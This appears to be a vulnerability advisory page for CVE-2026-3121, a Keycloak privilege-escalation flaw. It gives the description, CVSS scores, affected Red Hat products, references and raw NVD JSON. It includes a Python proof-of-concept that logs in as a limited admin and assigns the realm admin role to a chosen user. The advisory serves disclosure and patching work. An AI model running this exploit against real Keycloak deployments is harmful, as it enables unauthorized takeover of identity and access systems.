Security Vulnerability Report
CVE-2026-3121 CVSS 6.5 MEDIUM

Published: 2026-03-26 19:17:06
Last Modified: 2026-04-02 14:16:32

Description

A flaw was found in Keycloak. An administrator with `manage-clients` permission can exploit a misconfiguration where this permission is equivalent to `manage-permissions`. This allows the administrator to escalate privileges and gain control over roles, users, or other administrative functions within the realm. This privilege escalation can occur when admin permissions are enabled at the realm level.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:* - VULNERABLE
Keycloak (Affected versions per RHSA-2026:6477)
Red Hat Single Sign-On 7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# Target configuration
TARGET_URL = "https://keycloak.example.com"
REALM = "master"
CLIENT_ID = "admin-cli"

# Credentials for a user with 'manage-clients' permission only
USERNAME = "limited_admin"
PASSWORD = "password"

# Step 1: Get Access Token
auth_url = f"{TARGET_URL}/realms/{REALM}/protocol/openid-connect/token"
auth_payload = {
    "client_id": CLIENT_ID,
    "username": USERNAME,
    "password": PASSWORD,
    "grant_type": "password",
}
session = requests.Session()
auth_resp = session.post(auth_url, data=auth_payload)
if auth_resp.status_code != 200:
    print("Authentication failed")
    sys.exit(1)
token = auth_resp.json().get("access_token")
headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}

# Step 2: Exploit permission misconfiguration
# Attempting to assign admin role (requires 'manage-permissions')
# using 'manage-clients' permission due to CVE-2026-3121
target_user_id = "user-to-escalate-id"
admin_role_representation = [
    {"id": "admin-role-id", "name": "admin"}
]

# Endpoint to add realm role mappings to user
role_mapping_url = f"{TARGET_URL}/admin/realms/{REALM}/users/{target_user_id}/role-mappings/realm"
print(f"Attempting to assign admin roles to user {target_user_id}...")
exploit_resp = session.post(role_mapping_url, json=admin_role_representation, headers=headers)
if exploit_resp.status_code == 204:
    print("[+] Exploit successful! Privileges escalated.")
else:
    print(f"[-] Exploit failed. Status: {exploit_resp.status_code}")
```

References

https://access.redhat.com/errata/RHSA-2026:6477
https://access.redhat.com/errata/RHSA-2026:6478
https://access.redhat.com/security/cve/CVE-2026-3121 (Vendor Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2442277 (Issue Tracking, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-3121", "sourceIdentifier": "[email protected]", "published": "2026-03-26T19:17:06.213", "lastModified": "2026-04-02T14:16:31.713", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. An administrator with `manage-clients` permission can exploit a misconfiguration where this permission is equivalent to `manage-permissions`. This allows the administrator to escalate privileges and gain control over roles, users, or other administrative functions within the realm. This privilege escalation can occur when admin permissions are enabled at the realm level."}, {"lang": "es", "value": "Se encontró un fallo en Keycloak. Un administrador con permiso 'manage-clients' puede explotar una mala configuración donde este permiso es equivalente a 'manage-permissions'. Esto permite al administrador escalar privilegios y obtener control sobre roles, usuarios u otras funciones administrativas dentro del ámbito. Esta escalada de privilegios puede ocurrir cuando los permisos de administrador están habilitados a nivel de ámbito."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:-:*:*:*", "matchCriteriaId": "E5C930CB-4EAD-497B-A44B-D880F2A1F85B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D8BC03A-4198-4488-946B-3F6B43962942"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:*", "matchCriteriaId": "0A24CBFB-4900-47A5-88D2-A44C929603DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "9EFEC7CA-8DDA-48A6-A7B6-1F1D14792890"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:6477", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6478", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-3121", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442277", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
```